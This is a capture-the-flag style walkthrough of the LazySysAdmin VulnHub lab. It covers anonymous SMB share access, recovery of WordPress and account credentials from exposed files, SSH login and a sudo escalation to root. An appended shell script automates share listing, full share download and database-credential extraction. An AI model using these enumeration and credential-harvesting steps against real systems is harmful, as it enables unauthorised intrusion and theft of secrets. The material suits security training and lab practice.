This post walks through the LazySysAdmin VulnHub machine, covering WordPress penetration testing and the exploitation of an exposed SMB share.
Initial Reconnaissance
I started with an nmap scan to identify the target's IP address, which was 192.168.1.147, along with its open ports and services. A more detailed nmap service-version scan then identified the specific versions in use, including SSH and Samba (on ports 139 and 445). After that, I ran nikto against the web server, which revealed a WordPress installation and phpMyAdmin.
WordPress Enumeration
Next, I used wpscan to enumerate the WordPress installation and its vulnerabilities; during user enumeration I identified the username "admin". I attempted to brute-force the admin login, but that did not succeed.
Samba Exploitation
Since Samba was running, I used smbclient to connect to the server and list its shares, which included "brains" and IPC$. After some trial and error, I connected to the share and listed its contents, which included the WordPress files and a particularly interesting file named to_do_list.txt. I downloaded two files from there: wp-config.php and to_do_list.txt.
Credential Discovery & Initial Access Attempts
The wp-config.php file was a goldmine: it contained the database credentials (username and password). I tried using these credentials against the database, but that did not lead to any further progress. I then tried the same credentials to log in to the WordPress dashboard. I also generated a PHP reverse-shell payload with msfvenom and placed it in a WordPress theme template, but this attempt to get a shell failed.
Finding the Key
The to_do_list.txt file proved crucial. It contained a note and a password, "12345". The note explicitly stated that the admin had forgotten to remove this file and its password.
Gaining SSH Access & Privilege Escalation
Armed with the "12345" password, I paired it with the username "togie" (which I had identified as a user in the WordPress dashboard) and successfully SSHed into the server. Finally, I ran sudo -i to escalate to root, which completed the challenge.
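The workflow above, as an added example that is not part of the original write-up: a small POSIX-sh helper set covering the port scan, anonymous share enumeration and download, and extraction of the database credentials from a recovered wp-config.php. Only the target IP comes from the page; the share-name argument, the loot directory and the sample wp-config.php contents (placeholder values, not the machine's real credentials) are assumptions and constructed test data. The network stages wrap real nmap and smbclient flags; the credential parser runs offline on the constructed sample.

```shell
#!/bin/sh
# Added example, not from the original write-up: helper functions for the
# LazySysAdmin workflow. Only the target IP comes from the page; the share
# name, the loot directory and the sample wp-config.php below are
# assumptions / constructed test data, not the machine's real files.

TARGET="${TARGET:-192.168.1.147}"

# Stage 1: version scan of every TCP port, saved to a text file for review.
recon() {   # usage: recon HOST
    nmap -sV -p- -oN "nmap_$1.txt" "$1"
}

# Stage 2a: list SMB shares without a password (-N). This is the step that
# shows whether a data share (or IPC$) is reachable anonymously.
enum_shares() {   # usage: enum_shares HOST
    smbclient -L "//$1" -N
}

# Stage 2b: pull a whole share into ./loot so wp-config.php and to_do_list.txt
# can be read offline. Runs in a subshell so the caller's cwd is untouched.
dump_share() {   # usage: dump_share HOST SHARE
    ( mkdir -p loot && cd loot && \
      smbclient "//$1/$2" -N -c 'recurse ON; prompt OFF; mget *' )
}

# Stage 3: extract DB_NAME/DB_USER/DB_PASSWORD/DB_HOST from a wp-config.php.
# Tolerates single or double quotes and arbitrary spacing inside define(),
# and skips lines commented out with //, which a naive grep for
# "DB_PASSWORD" would report as a live credential.
extract_wp_creds() {   # usage: extract_wp_creds FILE  -> KEY=value lines
    grep -E "^[[:space:]]*define[[:space:]]*\([[:space:]]*['\"]DB_(NAME|USER|PASSWORD|HOST)['\"]" "$1" \
    | sed -E "s/^[[:space:]]*define[[:space:]]*\([[:space:]]*['\"]([A-Z_]+)['\"][[:space:]]*,[[:space:]]*['\"]([^'\"]*)['\"].*/\1=\2/"
}

wp_field() {   # usage: wp_field KEY FILE  -> value only
    extract_wp_creds "$2" | sed -n "s/^$1=//p"
}

# Constructed sample standing in for the wp-config.php pulled off the share.
# The values are placeholders, not the real machine's credentials.
SAMPLE="$(mktemp)"
trap 'rm -f "$SAMPLE"' EXIT
cat > "$SAMPLE" <<'EOF'
<?php
/** MySQL settings: values below are constructed placeholders */
define('DB_NAME', 'wordpress');
// define('DB_USER', 'olduser');        // stale, commented out: must be ignored
define( 'DB_USER', "wpuser" );
define('DB_PASSWORD', 'Ex4mple-Passw0rd');
define('DB_HOST', 'localhost');
define('DB_CHARSET', 'utf8');
EOF

# Offline demonstration of stage 3. Against a live target the network stages
# are run as:  recon "$TARGET"; enum_shares "$TARGET"; dump_share "$TARGET" SHARE
extract_wp_creds "$SAMPLE"
```

The parser deliberately anchors on `define` at the start of the line so that a commented-out, stale credential is not mistaken for the active one; once the values are out, they are the ones to try against the database, the WordPress login and, as happened here with the to_do_list.txt password, any system account whose name shows up in the dashboard.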
Here's a summary of the commands used:
nmap
nikto
wpscan
smbclient
ls (implied when listing directory contents)
msfvenom
ssh
sudo -i